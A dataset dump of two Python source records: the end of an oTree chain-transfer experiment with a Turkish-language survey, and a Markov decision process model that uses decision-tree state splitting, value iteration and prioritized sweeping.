katılmıyorum',\n 'Biraz katılmıyorum',\n 'Ne katılıyorum, ne de katılmıyorum',\n 'Biraz katılıyorum',\n 'Kesinlikle katılıyorum',\n ],\n widget=widgets.RadioSelectHorizontal,\n label=\"Kadere inanıyorum ve herşey tamamen özgür irade değil.\",\n )\n believe = models.StringField(\n choices=[\n 'Kesinlikle katılmıyorum',\n 'Biraz katılmıyorum',\n 'Ne katılıyorum, ne de katılmıyorum',\n 'Biraz katılıyorum',\n 'Kesinlikle katılıyorum',\n ],\n widget=widgets.RadioSelectHorizontal,\n label=\"İbadethanelerdeki hizmetlere/törenlere katılmak dışında yalnızken dua etmiyorum.\",\n )\n\n\n# FUNCTIONS\ndef creating_session(subsession: Subsession):\n subsession.group_randomly()\n rol_lst = ['P2', 'P3', 'P4', 'P5', 'P6', 'P7']\n for p in subsession.get_players():\n round = (\n subsession.round_number if subsession.round_number <= 8 else subsession.round_number - 8\n )\n if p.id_in_subsession == round:\n p.rol = 'P1'\n elif p.id_in_subsession == (9 - round):\n p.rol = 'P8'\n else:\n random.shuffle(rol_lst)\n p.rol = rol_lst.pop(0)\n for p in subsession.get_players():\n print('P{0}:{1}'.format(p.id_in_subsession, p.rol))\n print('---------------')\n\n\ndef set_payoffs(group: Group):\n for pl in group.get_players():\n if pl.rol == 'P1':\n pl.payoff = 2 * (Constants.endowment_Receiver + group.sent_2)\n elif pl.rol == 'P2':\n pl.payoff = (Constants.endowment_Decider - group.sent_2) * (\n Constants.endowment_Receiver + group.sent_3\n )\n elif pl.rol == 'P3':\n pl.payoff = (Constants.endowment_Decider - group.sent_3) * (\n Constants.endowment_Receiver + group.sent_4\n )\n elif pl.rol == 'P4':\n pl.payoff = (Constants.endowment_Decider - group.sent_4) * (\n Constants.endowment_Receiver + group.sent_5\n )\n elif pl.rol == 'P5':\n pl.payoff = (Constants.endowment_Decider - group.sent_5) * (\n Constants.endowment_Receiver + group.sent_6\n )\n elif pl.rol == 'P6':\n pl.payoff = (Constants.endowment_Decider - group.sent_6) * (\n Constants.endowment_Receiver + group.sent_7\n )\n elif pl.rol == 'P7':\n pl.payoff = (Constants.endowment_Decider - group.sent_7) * (\n Constants.endowment_Receiver + group.sent_8\n )\n elif pl.rol == 'P8':\n pl.payoff = (\n (Constants.endowment_Decider - group.sent_8)\n * (\n (Constants.endowment_Receiver + group.sent_2)\n + (Constants.endowment_Receiver + group.sent_3)\n + (Constants.endowment_Receiver + group.sent_4)\n + (Constants.endowment_Receiver + group.sent_5)\n + (Constants.endowment_Receiver + group.sent_6)\n + (Constants.endowment_Receiver + group.sent_7)\n + (Constants.endowment_Receiver + 
group.sent_8)\n )\n / 7\n )\n\n\n# PAGES\nclass Introduction(Page):\n @staticmethod\n def vars_for_template(player: Player):\n partner = player.get_others_in_group()[0]\n return {'round_number': '{}'.format(player.round_number)}\n\n\nclass instructions(Page):\n @staticmethod\n def is_displayed(player: Player):\n return player.round_number == 1\n\n form_model = 'player'\n form_fields = ['accept']\n\n\nclass ShuffleWaitPage(WaitPage):\n pass\n\n\nclass SendBackWaitPage(WaitPage):\n pass\n\n\nclass P8(Page):\n \"\"\"This page is only for P8\n P8 sends an amount (all, some, or none) after seeing the earlier transfers\"\"\"\n\n form_model = 'group'\n form_fields = ['sent_8']\n\n @staticmethod\n def is_displayed(player: Player):\n return player.rol == 'P8'\n\n @staticmethod\n def vars_for_template(player: Player):\n partner = player.get_others_in_group()[0]\n return {\n 'round_number': '{}'.format(player.round_number),\n 'prompt': '0 ile {} arasında bir sayı giriniz.'.format(Constants.endowment_Decider - 2),\n 'p1_receiver': Constants.endowment_Receiver + player.group.sent_2,\n 'p2_decider': Constants.endowment_Decider - player.group.sent_2,\n 'p2_receiver': Constants.endowment_Receiver + player.group.sent_3,\n 'p3_decider': Constants.endowment_Decider - player.group.sent_3,\n 'p3_receiver': Constants.endowment_Receiver + player.group.sent_4,\n 'p4_decider': Constants.endowment_Decider - player.group.sent_4,\n 'p4_receiver': Constants.endowment_Receiver + player.group.sent_5,\n 'p5_decider': Constants.endowment_Decider - player.group.sent_5,\n 'p5_receiver': Constants.endowment_Receiver + player.group.sent_6,\n 'p6_decider': Constants.endowment_Decider - player.group.sent_6,\n 'p6_receiver': Constants.endowment_Receiver + player.group.sent_7,\n 'p7_decider': Constants.endowment_Decider - player.group.sent_7,\n }\n\n\nclass P7(Page):\n \"\"\"This page is only for P7\"\"\"\n\n form_model = 'group'\n form_fields = ['sent_7', 'expect_7']\n\n @staticmethod\n def is_displayed(player: Player):\n return player.rol == 'P7'\n\n @staticmethod\n def vars_for_template(player: Player):\n return {\n 'round_number': '{}'.format(player.round_number),\n 'prompt': '0 ile {} arasında bir sayı giriniz.'.format(Constants.endowment_Decider - 2),\n 'p1_receiver': Constants.endowment_Receiver + player.group.sent_2,\n 'p2_decider': Constants.endowment_Decider - player.group.sent_2,\n 'p2_receiver': Constants.endowment_Receiver + player.group.sent_3,\n 'p3_decider': Constants.endowment_Decider - player.group.sent_3,\n 'p3_receiver': Constants.endowment_Receiver + player.group.sent_4,\n 'p4_decider': Constants.endowment_Decider - player.group.sent_4,\n 'p4_receiver': Constants.endowment_Receiver + player.group.sent_5,\n 'p5_decider': Constants.endowment_Decider - player.group.sent_5,\n 'p5_receiver': Constants.endowment_Receiver + player.group.sent_6,\n 'p6_decider': Constants.endowment_Decider - player.group.sent_6,\n }\n
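\n\n# Pages P6 down to P2 repeat the pattern of P8 and P7: each page is shown only to the\n# matching role and lists the transfers decided earlier in the chain (a decider keeps\n# endowment_Decider minus the amount sent; a receiver holds endowment_Receiver plus it).\n\n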
class P6(Page):\n \"\"\"This page is only for P6\"\"\"\n\n form_model = 'group'\n form_fields = ['sent_6', 'expect_6']\n\n @staticmethod\n def is_displayed(player: Player):\n return player.rol == 'P6'\n\n @staticmethod\n def vars_for_template(player: Player):\n return {\n 'round_number': '{}'.format(player.round_number),\n 'prompt': '0 ile {} arasında bir sayı giriniz.'.format(Constants.endowment_Decider - 2),\n 'p1_receiver': Constants.endowment_Receiver + player.group.sent_2,\n 'p2_decider': Constants.endowment_Decider - player.group.sent_2,\n 'p2_receiver': Constants.endowment_Receiver + player.group.sent_3,\n 'p3_decider': Constants.endowment_Decider - player.group.sent_3,\n 'p3_receiver': Constants.endowment_Receiver + player.group.sent_4,\n 'p4_decider': Constants.endowment_Decider - player.group.sent_4,\n 'p4_receiver': Constants.endowment_Receiver + player.group.sent_5,\n 'p5_decider': Constants.endowment_Decider - player.group.sent_5,\n }\n\n\nclass P5(Page):\n \"\"\"This page is only for P5\"\"\"\n\n form_model = 'group'\n form_fields = ['sent_5', 'expect_5']\n\n @staticmethod\n def is_displayed(player: Player):\n return player.rol == 'P5'\n\n @staticmethod\n def vars_for_template(player: Player):\n return {\n 'round_number': '{}'.format(player.round_number),\n 'prompt': '0 ile {} arasında bir sayı giriniz.'.format(Constants.endowment_Decider - 2),\n 'p1_receiver': Constants.endowment_Receiver + player.group.sent_2,\n 'p2_decider': Constants.endowment_Decider - player.group.sent_2,\n 'p2_receiver': Constants.endowment_Receiver + player.group.sent_3,\n 'p3_decider': Constants.endowment_Decider - player.group.sent_3,\n 'p3_receiver': Constants.endowment_Receiver + player.group.sent_4,\n 'p4_decider': Constants.endowment_Decider - player.group.sent_4,\n }\n\n\nclass P4(Page):\n \"\"\"This page is only for P4\"\"\"\n\n form_model = 'group'\n form_fields = ['sent_4', 'expect_4']\n\n @staticmethod\n def is_displayed(player: Player):\n return player.rol == 'P4'\n\n @staticmethod\n def vars_for_template(player: Player):\n return {\n 'round_number': '{}'.format(player.round_number),\n 'prompt': '0 ile {} arasında bir sayı giriniz.'.format(Constants.endowment_Decider - 2),\n 'p1_receiver': Constants.endowment_Receiver + player.group.sent_2,\n 'p2_decider': Constants.endowment_Decider - player.group.sent_2,\n 'p2_receiver': Constants.endowment_Receiver + player.group.sent_3,\n 'p3_decider': Constants.endowment_Decider - player.group.sent_3,\n }\n\n\nclass P3(Page):\n \"\"\"This page is only for P3\"\"\"\n\n form_model = 'group'\n form_fields = ['sent_3', 'expect_3']\n\n @staticmethod\n def is_displayed(player: Player):\n return player.rol == 'P3'\n\n @staticmethod\n def vars_for_template(player: Player):\n return {\n 'round_number': '{}'.format(player.round_number),\n 'prompt': '0 ile {} arasında bir sayı giriniz.'.format(Constants.endowment_Decider - 2),\n 'p1_receiver': Constants.endowment_Receiver + player.group.sent_2,\n 'p2_decider': Constants.endowment_Decider - player.group.sent_2,\n }\n\n\nclass P2(Page):\n \"\"\"This page is only for P2\"\"\"\n\n form_model = 'group'\n form_fields = ['sent_2', 'expect_2']\n\n @staticmethod\n def is_displayed(player: Player):\n return player.rol == 'P2'\n\n @staticmethod\n def vars_for_template(player: Player):\n return {\n 'round_number': '{}'.format(player.round_number),\n 'prompt': '0 ile {} arasında bir sayı giriniz.'.format(Constants.endowment_Decider - 2),\n }\n\n\nclass P1(Page):\n \"\"\"This page is only for P1\"\"\"\n\n @staticmethod\n def vars_for_template(player: Player):\n return {'round_number': '{}'.format(player.round_number)}\n\n @staticmethod\n def is_displayed(player: Player):\n return player.rol == 'P1'\n\n\nclass ResultsWaitPage(WaitPage):\n @staticmethod\n def after_all_players_arrive(group: Group):\n set_payoffs(group)\n\n\nclass Results(Page):\n \"\"\"This page displays the earnings of each player\"\"\"\n\n @staticmethod\n def vars_for_template(player: Player):\n p2_transfer = player.group.sent_2\n p3_transfer = player.group.sent_3\n p4_transfer = player.group.sent_4\n p5_transfer = player.group.sent_5\n p6_transfer = player.group.sent_6\n 
p7_transfer = player.group.sent_7\n p8_transfer = player.group.sent_8\n average_transfer = (\n player.group.sent_2\n + player.group.sent_3\n + player.group.sent_4\n + player.group.sent_5\n + player.group.sent_6\n + player.group.sent_7\n + player.group.sent_8\n ) / 7\n p1_receiver = Constants.endowment_Receiver + player.group.sent_2\n p2_decider = Constants.endowment_Decider - player.group.sent_2\n p2_receiver = Constants.endowment_Receiver + player.group.sent_3\n p3_decider = Constants.endowment_Decider - player.group.sent_3\n p3_receiver = Constants.endowment_Receiver + player.group.sent_4\n p4_decider = Constants.endowment_Decider - player.group.sent_4\n p4_receiver = Constants.endowment_Receiver + player.group.sent_5\n p5_decider = Constants.endowment_Decider - player.group.sent_5\n p5_receiver = Constants.endowment_Receiver + player.group.sent_6\n p6_decider = Constants.endowment_Decider - player.group.sent_6\n p6_receiver = Constants.endowment_Receiver + player.group.sent_7\n p7_decider = Constants.endowment_Decider - player.group.sent_7\n p7_receiver = Constants.endowment_Receiver + player.group.sent_8\n p8_decider = Constants.endowment_Decider - player.group.sent_8\n p8_receiver = (\n Constants.endowment_Receiver\n + (\n player.group.sent_2\n + player.group.sent_3\n + player.group.sent_4\n + player.group.sent_5\n + player.group.sent_6\n + player.group.sent_7\n + player.group.sent_8\n )\n / 7\n )\n p1_payoff = 2 * p1_receiver\n p2_payoff = p2_decider * p2_receiver\n p3_payoff = p3_decider * p3_receiver\n p4_payoff = p4_decider * p4_receiver\n p5_payoff = p5_decider * p5_receiver\n p6_payoff = p6_decider * p6_receiver\n p7_payoff = p7_decider * p7_receiver\n p8_payoff = (\n p8_decider\n * (\n p1_receiver\n + p2_receiver\n + p3_receiver\n + p4_receiver\n + p5_receiver\n + p6_receiver\n + p7_receiver\n )\n / 7\n )\n return {\n 'p2_transfer': p2_transfer,\n 'p3_transfer': p3_transfer,\n 'p4_transfer': p4_transfer,\n 'p5_transfer': p5_transfer,\n 'p6_transfer': p6_transfer,\n 'p7_transfer': p7_transfer,\n 'p8_transfer': p8_transfer,\n 'average_transfer': average_transfer,\n 'p1_receiver': p1_receiver,\n 'p2_decider': p2_decider,\n 'p2_receiver': p2_receiver,\n 'p3_decider': p3_decider,\n 'p3_receiver': p3_receiver,\n 'p4_decider': p4_decider,\n 'p4_receiver': p4_receiver,\n 'p5_decider': p5_decider,\n 'p5_receiver': p5_receiver,\n 'p6_decider': p6_decider,\n 'p6_receiver': p6_receiver,\n 'p7_decider': p7_decider,\n 'p7_receiver': p7_receiver,\n 'p8_decider': p8_decider,\n 'p8_receiver': p8_receiver,\n 'p1_payoff': p1_payoff,\n 'p2_payoff': p2_payoff,\n 'p3_payoff': p3_payoff,\n 'p4_payoff': p4_payoff,\n 'p5_payoff': p5_payoff,\n 'p6_payoff': p6_payoff,\n 'p7_payoff': p7_payoff,\n 'p8_payoff': p8_payoff,\n }\n\n\nclass OverallResults(Page):\n \"\"\"This page displays the earnings of each player\"\"\"\n\n @staticmethod\n def is_displayed(player: Player):\n return player.round_number == Constants.num_rounds\n\n @staticmethod\n def vars_for_template(player: Player):\n cumulative_payoff = sum([p.payoff for p in player.in_all_rounds()])\n return {'overall_earnings': cumulative_payoff}\n\n\nclass Survey(SurveyPage):\n \"\"\"This page displays the questionnaire for each player\"\"\"\n\n def is_displayed(self):\n return self.round_number == Constants.num_rounds\n\n form_model = 'player'\n form_fields = [\n 'dep',\n 'edu',\n 'age',\n 'gen',\n 'inc',\n 'h_inc',\n 'investment_options_1',\n 'investment_options_2',\n 'investment_options_3',\n 'investment_options_4',\n 'investment_options_5',\n 
'investment_options_6',\n 'investment_options_7',\n 'investment_options_8',\n 'investment_options_9',\n 'investment_options_10',\n 'env_cons_2',\n 'env_cons_3',\n 'env_cons_5',\n 'env_cons_6',\n 'env_cons_7',\n 'env_cons_9',\n 'fate',\n 'believe',\n 'gpa',\n ]\n\n\npage_sequence = [\n instructions,\n Introduction,\n P1,\n SendBackWaitPage,\n P2,\n SendBackWaitPage,\n P3,\n SendBackWaitPage,\n P4,\n SendBackWaitPage,\n P5,\n SendBackWaitPage,\n P6,\n SendBackWaitPage,\n P7,\n SendBackWaitPage,\n P8,\n ResultsWaitPage,\n Results,\n Survey,\n OverallResults,\n]\n","sub_path":"TPEGcont/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":26365,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"74474516","text":"import logging.config\nimport math\nimport warnings\nfrom pprint import pprint\nfrom timeit import default_timer as timer\n\nfrom django.conf import settings\nfrom numpy import mean\nfrom scipy import stats\n\nfrom markovdp.constants import *\nfrom markovdp.exceptions import ConfigurationError, InternalError, StateNotSetError, ParameterError\nfrom markovdp.decision_tree import LeafNode\n\nlogging.config.dictConfig(settings.LOGGING)\nlogger = logging.getLogger(__name__)\n\n\nclass MDPDTModel:\n \"\"\"MDPDTModel Class.\n\n Class that represents a Markov Decision Process model with a decision tree state structure.\n\n \"\"\"\n\n def __init__(self, conf):\n required_fields = [INITIAL_PARAMETERS, PARAMETERS, ACTIONS, DISCOUNT,\n INITIAL_Q_VALUES, SPLIT_ERROR, MIN_MEASUREMENTS]\n\n for f in required_fields:\n if f not in conf:\n raise ConfigurationError(\"%s not provided in the configuration\" % f, logger)\n\n self._discount = conf[DISCOUNT]\n self._parameters = list(conf[PARAMETERS])\n self._min_measurements = max(conf[MIN_MEASUREMENTS], 1)\n self._split_error = conf[SPLIT_ERROR]\n self._actions = conf[ACTIONS]\n self._initial_q_values = conf[INITIAL_Q_VALUES]\n self._initial_params = self._get_params(conf[INITIAL_PARAMETERS])\n self._current_state = None\n self._current_measurements = None\n self._new_states = []\n self._transition_data = []\n self._statistical_test = STUDENT_TTEST\n\n # initiate the decision tree\n self._root = LeafNode(self, self, self._actions, self._initial_q_values, 0, 1)\n self._states = [self._root]\n self._priorities = [0]\n for name, values in self._initial_params.items():\n self._root.split(name, values)\n\n # set the default update and splitting algorithms and initialize the split counters\n self._update_algorithm = SINGLE_UPDATE\n self._update_error = 0.1 # default value for value iteration and PS error\n self._max_updates = 100 # default value for prioritized sweeping updates\n self._split_criterion = MID_POINT\n self._considered_transitions = True\n self._allow_splitting = True\n self._splits = {}\n for p in self._parameters:\n self._splits[p] = 0\n\n logger.debug('Initialized MDPDT model with {} states'.format(len(self._states)))\n\n @property\n def allow_splitting(self):\n \"\"\"Allow or prevent the decision tree from splitting its nodes.\"\"\"\n return self._allow_splitting\n\n @allow_splitting.setter\n def allow_splitting(self, allow=True):\n self._allow_splitting = allow\n logger.debug(\"Allow splitting set to {}\".format(allow))\n\n @property\n def discount(self):\n \"\"\"Returns discount of reward.\"\"\"\n return self._discount\n\n @property\n def splits(self):\n \"\"\"Returns the number of splits that happened for each parameter.\"\"\"\n return self._splits\n\n @property\n def 
statistical_test(self):\n \"\"\"The statistical test used when deciding whether to split.\"\"\"\n return self._statistical_test\n\n @statistical_test.setter\n def statistical_test(self, stat_test):\n self._statistical_test = stat_test\n\n def set_update_algorithm(self, update_algorithm, update_error=0.1, max_updates=10):\n \"\"\"Set the value-update algorithm and its error/iteration limits.\"\"\"\n self._update_algorithm = update_algorithm\n self._update_error = update_error\n self._max_updates = max_updates\n logger.debug('Algorithm for updates set to {} with error = {} and max updates = {}'\n .format(update_algorithm, update_error, max_updates))\n\n def set_splitting_criterion(self, split_criterion, consider_transitions=True):\n \"\"\"Set the splitting criterion\"\"\"\n if split_criterion not in SPLIT_CRITERIA:\n raise ParameterError(\"Unknown splitting algorithm: \" + split_criterion, logger)\n self._split_criterion = split_criterion\n self._considered_transitions = consider_transitions\n logger.debug(\"Splitting criterion set to {}, consider transitions set to {}\"\n .format(split_criterion, consider_transitions))\n
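\n # typical configuration (illustrative; `model` is a hypothetical MDPDTModel instance):\n #   model.set_update_algorithm(PRIORITIZED_SWEEPING, update_error=0.05, max_updates=50)\n #   model.set_splitting_criterion(MAX_POINT, consider_transitions=True)\n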
InternalError(\"Tried to replace the root node with a different initial node\", logger)\n\n self._root = new_node\n\n def set_state(self, measurements):\n \"\"\"Sets the current state based on the given measurements.\n\n Args:\n measurements (dict): A dictionary of measurements\n\n \"\"\"\n self._current_measurements = measurements\n self._current_state = self._root.get_state(measurements)\n\n def remove_state(self, state_num):\n \"\"\"Removes the state with the given state_num from the model\n\n Args:\n state_num (int): The number of the state under removal\n\n \"\"\"\n self._root.remove_state(state_num)\n self._states[state_num] = None\n self._priorities[state_num] = 0\n\n def store_transition_data(self, data):\n \"\"\"Stores the given transition data to be used later on for retraining.\n\n Args:\n data (list): A list of transition data\n\n \"\"\"\n self._transition_data += data\n\n def add_states(self, states):\n \"\"\"Adds new states to the model. The first will go in the empty spot and the rest at the end.\n\n Args:\n states (list(State)): A list of states to add to the model\n\n \"\"\"\n # the first state will not be appended at the end\n self._root.extend_states(len(states) - 1)\n self._priorities += [0] * (len(states) - 1)\n self._new_states = states\n\n # place the first state in the empty spot and the rest at the end\n replaced_state_num = states[0].state_num\n if not self._states[replaced_state_num] is None:\n raise InternalError(\"Replaced state was not None\")\n\n self._states[replaced_state_num] = states[0]\n self._states += states[1:]\n\n def suggest_action(self):\n \"\"\"Suggest the optimal action to take from the current state.\n\n Returns:\n action (tuple): The optimal action from the current state\n\n \"\"\"\n if self._current_state is None:\n raise StateNotSetError(logger)\n\n return self._current_state.get_optimal_action()\n\n def get_legal_actions(self):\n \"\"\"Returns all the legal actions from the current_state.\"\"\"\n if self._current_state is None:\n raise StateNotSetError(logger)\n\n return self._current_state.get_legal_actions()\n\n def update(self, action, measurements, reward):\n \"\"\"Updates model after taking given action and ending up in the state corresponding to the measurements.\n\n Args:\n action (tuple): The recent taken action\n measurements (dict): The measurements collected after the action\n reward (double): The reward acquired through the specific action\n\n \"\"\"\n if self._current_measurements is None:\n raise StateNotSetError(logger)\n\n # TODO move this where the splitting is decided\n self._current_state = self._root.get_state(self._current_measurements)\n\n # determine the new state\n new_state = self._root.get_state(measurements)\n new_num = new_state.state_num\n\n # store the transition information\n trans_data = (self._current_measurements, measurements, action, reward)\n self._current_state.store_transition(trans_data, new_num)\n\n # update the qstate\n q_state = self._current_state.get_q_state(action)\n q_state.update(new_state, reward)\n\n # update the model values according to the chosen algorithm\n if self._update_algorithm == SINGLE_UPDATE:\n self._q_update(q_state)\n self._current_state.update_value()\n elif self._update_algorithm == VALUE_ITERATION:\n self.value_iteration()\n elif self._update_algorithm == PRIORITIZED_SWEEPING:\n self.prioritized_sweeping()\n\n # consider splitting the initial_state\n if self._allow_splitting:\n self.split()\n\n # update the current state and store the last measurements\n self._current_state = 
new_state\n self._current_measurements = measurements\n\n def retrain(self):\n \"\"\"Retrains the model with the transition data temporarily stored in the model.\"\"\"\n for m1, m2, a, r in self._transition_data:\n # Determine the states involved in the transition\n old_state = self._root.get_state(m1)\n new_state = self._root.get_state(m2)\n\n # Store the transition data in the initial state of the transition\n new_num = new_state.state_num\n old_state.store_transition((m1, m2, a, r), new_num)\n\n # Update the qstate\n q_state = old_state.get_q_state(a)\n q_state.update(new_state, r)\n\n # clear the transition data from the model\n self._transition_data = []\n\n def chain_split(self):\n \"\"\"Repeatedly attempts to split all the nodes until no splits are possible.\"\"\"\n num_splits, did_split = 0, True\n while did_split:\n did_split = False\n states = list(self._states)\n for state in states:\n if self.split(state=state):\n did_split = True\n num_splits += 1\n\n if did_split:\n self.value_iteration()\n\n logger.debug(\"Chain splitting complete after {} splits\".format(num_splits))\n\n def _q_update(self, q_state):\n \"\"\"Runs a single update for the Q-value of the given state-action pair.\"\"\"\n new_q_value = 0\n for i in range(len(self._states)):\n t = q_state.get_transition(i)\n r = q_state.get_reward(i)\n new_q_value += t * (r + self._discount * self._states[i].value)\n\n q_state.q_value = new_q_value\n\n def _v_update(self, state):\n \"\"\"Recalculates values of all Q-states of the given state, updates the value of the state accordingly.\"\"\"\n for q_state in state.q_states:\n self._q_update(q_state)\n\n state.update_value()\n\n def value_iteration(self, error=None):\n \"\"\"Runs the value iteration algorithm on the model.\"\"\"\n if error is None:\n error = self._update_error\n\n start = timer()\n repeat = True\n while repeat:\n repeat = False\n for state in self._states:\n old_value = state.value\n self._v_update(state)\n new_value = state.value\n if abs(old_value - new_value) > error:\n repeat = True\n end = timer()\n\n logger.debug(\"Value iteration complete after {} seconds\".format(end - start))\n\n def prioritized_sweeping(self, initial_state=None, error=None, max_updates=None, debug=False):\n \"\"\"Runs prioritized sweeping starting from the given state.\"\"\"\n if self._current_state is None and initial_state is None:\n raise StateNotSetError(logger)\n\n if initial_state is None:\n initial_state = self._current_state\n if error is None:\n error = self._update_error\n if max_updates is None:\n max_updates = self._max_updates\n\n # transition probabilities have changed for the initial state\n reverse_transitions = [{} for _ in self._states]\n for state in self._states:\n for state_num, t in state.get_max_transitions().items():\n reverse_transitions[state_num][state.state_num] = t\n\n state = initial_state\n for i in range(max_updates):\n\n # update the state value\n old_value = state.get_value()\n self._v_update(state)\n new_value = state.get_value()\n delta = abs(new_value - old_value)\n\n # update the priorities of the predecessors\n rev_transitions = reverse_transitions[state.state_num]\n for state_num, t in rev_transitions.items():\n self._priorities[state_num] = max(t * delta, self._priorities[state_num])\n\n # zero the updated state's priority\n self._priorities[state.state_num] = 0\n\n # Choose the next max priority state\n # TODO with Priority Queue - but needs to support item removal\n max_index, max_priority = 0, 0\n for j in range(len(self._priorities)):\n if 
self._priorities[j] > max_priority:\n max_priority = self._priorities[j]\n max_index = j\n\n # stop if the priority gets below the supplied limit\n if max_priority <= error:\n break\n\n state = self._states[max_index]\n\n def stat_test(self, x1, x2):\n stat = None\n if self._statistical_test == STUDENT_TTEST:\n with warnings.catch_warnings():\n warnings.simplefilter(\"ignore\")\n _, stat = stats.ttest_ind(x1, x2)\n elif self._statistical_test == WELCH_TTEST:\n with warnings.catch_warnings():\n warnings.simplefilter(\"ignore\")\n _, stat = stats.ttest_ind(x1, x2, equal_var=False)\n elif self._statistical_test == MANN_WHITNEY_UTEST:\n try:\n _, stat_one_sided = stats.mannwhitneyu(x1, x2)\n stat = 2 * stat_one_sided\n except ValueError:\n stat = 1\n elif self._statistical_test == KOLMOGOROV_SMIRNOV:\n _, stat = stats.ks_2samp(x1, x2)\n return stat\n\n def split(self, state=None):\n # Initialize timer\n start = timer()\n\n # Check if state exists\n if state is None:\n state = self._current_state\n\n # Collect the transitions that occurred after taking the optimal action\n optimal_action = state.get_optimal_action()\n transitions = [t for ts in state.transition_data for t in ts if t[2] == optimal_action]\n\n if self._split_criterion == MID_POINT and len(transitions) == 0:\n return False\n\n # Mid point splitting\n incr_measurements, decr_measurements = [], []\n best_incr_par, best_decr_par = 0, 0\n # Other point splitting types\n q_values = []\n\n if self._considered_transitions:\n # Partition the transitions to those that would increase or decrease the q-value\n if self._split_criterion == MID_POINT:\n for m1, m2, a, r in transitions:\n new_state_value = self._root.get_state(m2).value\n q_value = r + self._discount * new_state_value\n if q_value >= state.value:\n incr_measurements.append(m1)\n else:\n decr_measurements.append(m1)\n else:\n for m1, m2, a, r in transitions:\n new_state_value = self._root.get_state(m2).get_value()\n q_value = r + self._discount * new_state_value\n q_values.append((m1, q_value))\n else:\n # Partition the transitions to those that gave higher or lower rewards than average\n if self._split_criterion == MID_POINT:\n average_rewards = mean([t[3] for t in transitions])\n for m1, m2, a, r in transitions:\n if r >= average_rewards:\n incr_measurements.append(m1)\n else:\n decr_measurements.append(m1)\n else:\n for m1, m2, a, r in transitions:\n q_values.append((m1, r))\n\n if min(len(incr_measurements), len(decr_measurements)) < self._min_measurements \\\n and self._split_criterion == MID_POINT:\n return False\n\n if self._split_criterion == INFO_GAIN:\n # Calculate the information required for the current state\n state_value = state.get_value()\n high_q = sum(1 for q in q_values if q[1] > state_value)\n low_q = len(q_values) - high_q\n state_info = self._info(high_q, low_q)\n\n # Find the splitting point with the lowest null hypothesis probability\n best_par, best_point = None, None\n lowest_error = 1\n # Max point splitting\n max_diff = 0\n # Info Gain Splitting\n min_info = float('inf')\n\n if self._split_criterion == MID_POINT:\n for par in self._parameters:\n incr_par = [m[par] for m in incr_measurements]\n decr_par = [m[par] for m in decr_measurements]\n t1_error = self.stat_test(incr_par, decr_par)\n\n if t1_error < lowest_error:\n lowest_error = t1_error\n best_par = par\n best_incr_par = incr_par\n best_decr_par = decr_par\n else:\n for par in self._parameters:\n par_values = sorted([(q[0][par], q[1]) for q in q_values])\n # Only consider points that leave at 
least min_measurements points on either side\n for i in range(self._min_measurements, len(transitions) - self._min_measurements + 1):\n # Only split between distinct measurements\n if par_values[i][0] == par_values[i - 1][0]:\n continue\n\n low_values = [p[1] for p in par_values[:i]]\n high_values = [p[1] for p in par_values[i:]]\n\n if self._split_criterion == INFO_GAIN:\n low_incr = sum(1 for q in low_values if q > state_value)\n high_incr = sum(1 for q in high_values if q > state_value)\n low_decr = len(low_values) - low_incr\n high_decr = len(high_values) - high_incr\n info = self._expected_info(low_incr, low_decr, high_incr, high_decr)\n\n if info < min_info:\n min_info = info\n best_par = par\n best_point = 0.5 * (par_values[i][0] + par_values[i - 1][0])\n\n continue\n\n t1_error = self.stat_test(low_values, high_values)\n\n if self._split_criterion == MAX_POINT:\n if t1_error > self._split_error:\n continue\n low_avg = mean(low_values)\n high_avg = mean(high_values)\n if abs(high_avg - low_avg) > max_diff:\n max_diff = abs(high_avg - low_avg)\n best_par = par\n best_point = (par_values[i][0] + par_values[i - 1][0]) / 2\n else:\n if t1_error < lowest_error:\n lowest_error, best_par = t1_error, par\n best_point = (par_values[i][0] + par_values[i - 1][0]) / 2\n\n if self._split_criterion in [MID_POINT, ANY_POINT]:\n if best_par is None or lowest_error > self._split_error:\n return False\n elif self._split_criterion == MAX_POINT:\n if best_par is None:\n return False\n else:\n if best_par is None or min_info > state_info:\n return False\n\n if self._split_criterion == MID_POINT:\n incr_mean = mean(best_incr_par)\n decr_mean = mean(best_decr_par)\n best_point = (incr_mean + decr_mean) / 2\n\n # Perform a split at the selected point\n state.split(best_par, [best_point])\n self._splits[best_par] += 1\n\n # Recalculate the values of the new states generated by the split\n for state in self._new_states:\n self._v_update(state)\n self._new_states = []\n\n end = timer()\n\n logger.debug(\"Split with {} at {} with {} {} after {} seconds\"\n .format(best_par, best_point, self._split_criterion, max_diff, end - start))\n return True\n\n def _expected_info(self, p1, n1, p2, n2):\n \"\"\"Returns the expected information required as per Quinlan's ID3.\"\"\"\n s = p1 + n1 + p2 + n2\n s1 = p1 + n1\n s2 = p2 + n2\n\n return (s1 / s) * self._info(p1, n1) + (s2 / s) * self._info(p2, n2)\n\n @staticmethod\n def _info(p, n):\n \"\"\"Returns the expected classification information as per Quinlan's ID3.\"\"\"\n if n <= 0 or p <= 0:\n return 0\n else:\n return -(p / (p + n)) * math.log(p / (p + n), 2) - (n / (p + n)) * math.log(n / (p + n), 2)\n\n def get_percent_not_taken(self):\n \"\"\"Returns the percentage of actions that have never been taken.\"\"\"\n total = 0\n not_taken = 0\n for state in self._states:\n for q_state in state.q_states:\n total += 1\n if q_state.get_num_taken() == 0:\n not_taken += 1\n\n return not_taken / total\n\n def print_transition_data(self):\n \"\"\"Prints all the stored transition data for all the states in the model.\"\"\"\n if self._transition_data:\n print(\"Temporary data in the model:\")\n pprint(self._transition_data)\n\n for state in self._states:\n print(\"State %d:\" % state.state_num)\n pprint(state.transition_data)\n\n def print_model(self, detailed=False):\n \"\"\"Prints the states of the model. 
